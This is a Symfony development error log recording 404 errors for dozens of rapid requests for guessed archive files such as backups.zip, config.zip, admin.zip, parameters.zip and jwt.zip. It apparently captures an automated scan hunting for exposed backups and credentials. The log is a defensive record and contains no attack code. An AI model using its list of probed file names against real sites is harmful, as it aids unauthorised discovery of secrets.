[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cfg.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cfg.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ini.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ini.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /parameters.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /parameters.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /directadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /directadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yaml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yaml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /jwt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /jwt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /current.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /current.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /stable.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /stable.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /construct.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /construct.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /products.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /products.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /opencart.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /opencart.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /react.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /react.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mega.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mega.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /edge.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /edge.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /nodejs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /nodejs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /icloud.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /icloud.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rails.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rails.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /linkedin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /linkedin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cordova.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cordova.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
